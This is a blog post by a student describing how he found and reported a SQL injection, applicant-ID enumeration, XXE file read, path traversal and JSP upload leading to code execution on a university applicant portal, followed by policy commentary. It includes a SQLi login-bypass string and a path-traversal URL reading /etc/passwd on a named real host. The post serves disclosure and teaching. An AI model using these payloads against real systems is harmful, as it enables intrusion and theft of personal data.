Hacking the University in a Few Steps

Escalating a Wrong Date to Get Code Execution

FHantke
12 min readApr 18, 2022
Picture: Josh Sorenson

A couple of weeks ago, a fresh cup of tea was waiting on my table as I was about to complete my application process to Saarland University. After my initial application was accepted, I was asked to upload some additional documents, such as my passport, to finish the process. Therefore, I was forwarded to an uploader platform, where I should log in using my applicant’s ID and my birthday as the password. However, my birthday did not work, and I was denied a login. This is the story of how a wrong birth date has led to code execution on a university server.

You Shall Not Pass?

After my birthday did not work as a password, I took a big sip from my tea and pondered the next steps. Eventually, I did what I always do when a website does not work for me: I analyzed the website’s traffic!

The login page asks for the applicant ID and the birthday.

The traffic that is demonstrated below, shows that when I click the login button, the application sends a request to a loginBewerber endpoint containing the applicant’s ID in the URL and the birthday in the request body. The ID and the birthday are both user-provided input we can play with and try to manipulate. The first manipulation I tried was to bypass the date check with a typical SQL injection (SQLi): 01.02.1999"+OR+"1"="1. With this kind of attack, attackers can abuse the syntax of SQL. In this case I falsely validate the birthday check condition and hope that the service logs me in. To my surprise, the attack worked on the first try, and the answer from the server provided an XML with lots of my personal information, like my address, gender, and birth date. Later, I also learned that the date check was only client-side, and any password provided the XML.

The login request contains the applicant’s ID in the URL and the birthday in the request body.
The login request returns an XML with lots of personal information.

Quickly, I checked all the information in this XML and found the reason, why my initial login attempt did not work: the birthday that the administration stored for my account had the wrong year, unfortunately. At least, the bypass worked flawlessly to get the correct date and to pass the login.

I Have a Bad Feeling About This

At that point, I was curious about what else this application had to offer. After all, I was asked to upload my passport to this service. It was already an uneasy feeling without the authentication bypass to upload important documents to an application that is only secured by the applicant’s birthday. I mean, how long would it take to brute force the birthday of a standard student? But now, with the known vulnerability, the feeling was even worse.

This feeling was further confirmed when I looked at the applicant’s ID in the login URL. It needs no professional hacker to see that the applicant’s ID is just a regular number. In my exemplary case, the number is the 45678. What happens if I subtract one from the ID and send the request again? The answer came quick, and I almost choked on my tea: other users’ personal information was shown on my screen.

My screen showed the information for the applicant 45677, and the same request worked for every other ID as well. Although my real ID was not the 45678, the number was in the same region. Accordingly, this means that almost 50,000 personal user information, such as the home address and e-mail, is freely accessible to anyone; something I am, as a user of this platform, not very happy about.

Time to Upload Some Documents

Now that I was able to log into my user account, I could have begun to upload the requested papers. However, it should not be a big surprise that I did not feel like uploading personal documents to this service. Nevertheless, my curiosity was piqued as I wanted to know how the upload functionality works. So I sent some test documents instead.

The traffic analysis revealed an exotic uploading process, consisting of two requests. First, as shown below, a simple post request is sent to upload a document. The example request below shows that the URL contains a file name, and that the body holds the content. As soon as the first request is accepted, the server responds with plain text containing the path where it stored the document. Next, the client sends another request to link the uploaded file with the corresponding application. In the second example request below, we find the applicant’s ID in the URL and the file name from the previous request in the file_renamed parameter. Eventually, the service lists the uploaded document as part of the user’s application.

The upload request contains the filename and parts of the path in its URL.
The second part of the upload process sends a request to connect a file with the corresponding applicant.

I have seen similar upload processes before. Thus, two aspects about this upload process caught my eye: The first one is that the initial URL contains the file name and other parts of the path where the server stores the file. This can be seen if we analyze the URL parameters and compare their values to the response text we get from the server: File saved as /data/uploader/uploads/20221/45678_2022_01_31_22_21_18_2_Passport_Hantke_Florian.pdf. What happens if we manipulate this path?

The second oddity is that the createUploadFile request returns an error message with an informative stack trace whenever the file_renamed parameter does not point to an existing file; crucial information we can use for further analyses! Let me take another sip from my tea and then we continue.

Beginning with the second request, the one which provided a stack trace, I first considered various ways to escalate this flaw further. Not only does the stack trace reveal beneficial information, such as the structure of the source code, but it also replies the value of the file_renamed parameter. As the file_renamed parameter is part of an XML structure, the next attack I tried was an XML external entity (XXE) injection. This kind of attacks abuse external entities in XML to send server-side requests or, as I do in our case, to load file content or directory listings into the XML structure. As demonstrated in the request below, I defined the entity x to contain the file content from /etc/passwd. The server then uses this entity as content for the file_renamed parameter. Since this content is not a valid file name, the server responds with an error message containing the invalid filename — the content of /etc/passwd. Consequently this means, we can read all directories and files the user is permitted to — not only standard Linux files, but also the application’s source code or user-uploaded files.

The upload request is vulnerable to XXE.
The vulnerable request returns the content of /etc/passwd inside of an error message.

Next, I continued analyzing the first discussed oddity, the path parameters from the upload request. As previously mentioned, the response from the server gives feedback on where the file was stored. With this hint, I quickly figured out that the endpoint is vulnerable to a Path Traversal attack. Path Traversal attacks allow hackers to manipulate a path without the server checking the validity. In this case, it allowed me to store the uploaded file wherever I wanted on the server. But that was just the tip of the iceberg, as I discovered an even more devastating fact: the server never checked the file content and file’s extension. Therefore, the server was wide open for more critical kinds of exploits.

Oops, Did I Execute Code?

While I was enjoying the last sip of my tea, I thought about ways to take advantage of the arbitrary file upload vulnerability. Of course, I could overwrite configuration files or upload HTML documents to trigger XSS. Yet, I had a better idea.

From the error message as mentioned above, we know that the webserver is Java-based. Accordingly, I guessed it must be possible to execute JavaServer Pages (JSP) files. JSP allows web developers to write HTML code containing dynamic Java parts executed on the server-side. This implies, an attacker in control of a JSP file that is loaded by the server can also execute arbitrary code on the server-side.

Since I have already found a way to upload an arbitrary file, I could also upload a JSP file. One question, however, remained unclear: How do I bait the server into executing the file? Usually, to trigger a JSP file, the file path must be opened with the browser. In this case, the initial upload directory was outside the webroot, which means I could not simply request the file path. Luckily, I could use the path traversal in the file upload request to store the file wherever I wanted, and thus, also inside the web directory. Besides that, the application also offered a more straightforward solution to load arbitrary files — a link vulnerable to path traversal so that I can load documents from arbitrary paths: https://www.lsf.uni-saarland.de/uploader/
upload?file=../../../../etc/passwd&folder=uploads&sem=20221
. In effect, I could freely load an uploaded JSP file and execute it.

To test my idea, the first (and only) JSP file I uploaded to the server was the the beautifully and stealthily named 9187b2b784c12987bpnwoleivsal.jsp (see below). This was no 007 however, this was just a test, a math function to prove that code execution works. Of course, it did work and I was theoretically able to execute arbitrary code on the server. By now, you probably all know what this means: I could not only read all files users have uploaded, I could also try to escalate privileges further, get root and overtake the server, or explore the university network further from the inside. That was enough hacking for me, as I did not want to make anyone angry before my first day — it was time to start reporting.

The upload request does not check the file extension or content. This request uploads an JSP test file.
When the JSP file is loaded, the random number is generated on the server-side.

Reporting!

Before I start writing a report, I always go through the same mental exercise. I lean back and think about what potential profits a group of criminals would gain with the discovery of such security-bugs and what the impact would be for the users and the organization. In this case, criminals could use the first discovered vulnerability to bypass the initial authentication check and login with any user, even though they do not have any valid applicant’s account. Once they opened the door, they could then upload a JSP file to open a reverse shell. At that point they have won the jackpot: they could not only steal personal information from almost 50,000 people but they could also take over the entire application or even the server.

Given these clear facts, writing a vulnerability report was done quickly the same evening so that I sent an email to the university’s data center the next day. I informed them about my findings and shortly after, the application was offline and I was only prompted with a 403 page. Eventually, I received an email from the Hochschul-IT-Zentrum (hiz), telling me that they can confirm the findings and were looking into the problems. Furthermore, we had a friendly and informative phone call about the situation.

A day after the bugs were reported, the file uploader was not accessible anymore.

At the time of writing, the situation is still the same, and I still see the 403 page. However, I know that the hiz worked on fixing the aforementioned issues and already ordered a penetration test to check the application before taking it online again. Furthermore, the self-implemented service will be replaced by an established external program in the future to avoid similar porblems.

A Profound Problem

Now, the reporting was done and the case was closed. I grabbed my teacup and walked into the kitchen while still thinking about this case and wondering how it could be that such fundamental security issues keep existing. Sure, it is always easy to blame some developers for their mistakes, however, in my opinion, the problem is more profound than someone writing bad code. The facts outlined in this article, as well as in many others (Zerforschung, CCC), show us that the problem is a general lack of understanding of IT security in Germany, and is continuing to lag far behind. It is not solvable by only cleaning up each and every application individually, like cleaning teacups again and again. In the long term, this cleaning procedure works astonishingly well for teacups but evidently not at all for applications.
It follows that this profound problem can only be solved politically! Once, Arthur Wing Pinero wrote: “In English society while there is tea there is hope”. So, I am convinced that this also applies to German society. As I am already brewing my next tea, I have hope that basic issues such as those addressed by this article will hardly exist in the future. Therefore, I want to use this last section to give my thoughts on how to improve the general IT security in Germany and how to foster the increased understanding of this important matter.

As I said earlier, it is not only the developers’ fault when they write error-prone software. Often, the pressure of project deadlines cause developers to prioritize key features of their application rather than the application’s security. For instance, during the COVID-19 pandemic, many companies wanted to be the first one on the market with a particular product or service and therefore may have neglected their product’s security (i.e. corona testcenter). The competition in the industry is so incredibly high due to a low cost of entry, product churn is increasingly more rapid and the cost of missing out on a new trend far outweighs the cost of lousy software. A sentence from the IT security section of the current coalition agreement attempts to reign in this kind of wanton behavior: “manufacturers must be liable for damages negligently caused by IT security vulnerabilities in their products”. Reading this as an IT security guy sounds hopeful at first, but thinking more about it is disillusioning. The statement indicates that only in the worst case, if criminal hackers successfully attack an application and deal damage, it can be very costly for the manufacturer. In my opinion as amateur enthusiast of law and political, this way of thinking seems wrong and will inevitably cost the application’s users. If we always wait for the worst case, the damage has already happened. Of course, we also have GDPR, but honestly, with my limited law knowledge, neither do I know whether the existence of a vulnerability is punishable or not, nor have I ever heard of any such precedent. I think, the government needs to come up with strict enforced and better-defined penalties for security vulnerabilities that are reported by independent security researchers even before they begin to be abused by criminals.

This being said, bugs do not have to be found only by independent researchers or criminals. Companies can and should obviously check their own security as well. Additionally, they should rely on professional external penetration tests as the tester often views the application from another angle. In fact, frequent tests are planned for government agencies already, as stated in the IT security part of the coalition agreement. However, in my opinion, this should also include all public institutions like a university, for example, because people trust them to be secure. Even more, it should further include all companies operating in Germany.

Another aspect besides penetration testing is to improve the general IT security knowledge. Before developing software, people need to get at least a simple understanding of security best practices in software development. As an illustration, before you can work as a cook, you need to get an official health certificate so that you do know how not to poison your guests. Before you drive a truck for your company, you need a special license so that you do not crash your vehicle. Why don’t you need a developer license so that you do not poison the users of your application or crash your software? Although such licenses are not realistic for software development, security education is! IT security courses must be a crucial part of every IT education. Moreover, routinely IT security training must be mandatory for every developer to reach lateral entrants and keep all developers up to date.

Finally, my last thought is another aspect of the coalition agreement: “Identifying, reporting and closing security vulnerabilities in a responsible process, e.g. in IT security research, should be legally feasible”. This is a very important fact! Currently, looking for a vulnerability in an application is a gray area, even if your personal data is at risk. Luckily, I have not yet encountered any problems with this, and companies were always happy with me reporting their vulnerabilities. However, that is not always the case, as other examples highlight the mistreatment of security professionals as criminals. The fact that the legal aspects of vulnerability testing are not completely clear, scares people from looking into products they use. More people would check products and report vulnerabilities if the process was well-defined and legal. We just witnessed a prime example for this: I mean, how is it that nearly 50,000 university students logged in to an upload portal (that already looks fishy) without anyone finding or reporting these elementary issues? Responsible vulnerability research is a public service and it must be legalized!

With this last statement, I hope you can agree that something must be changed in our education and our legal institution to create a more secure internet and world. Thank you for reading. Now, get a cup of tea and a bit of hope for the rest of your day.

https://twitter.com/fh4ntke

--

--

FHantke
FHantke

Written by FHantke

Computer Science Student. Interested in IT security and forensics. https://fhantke.de/

Responses (10)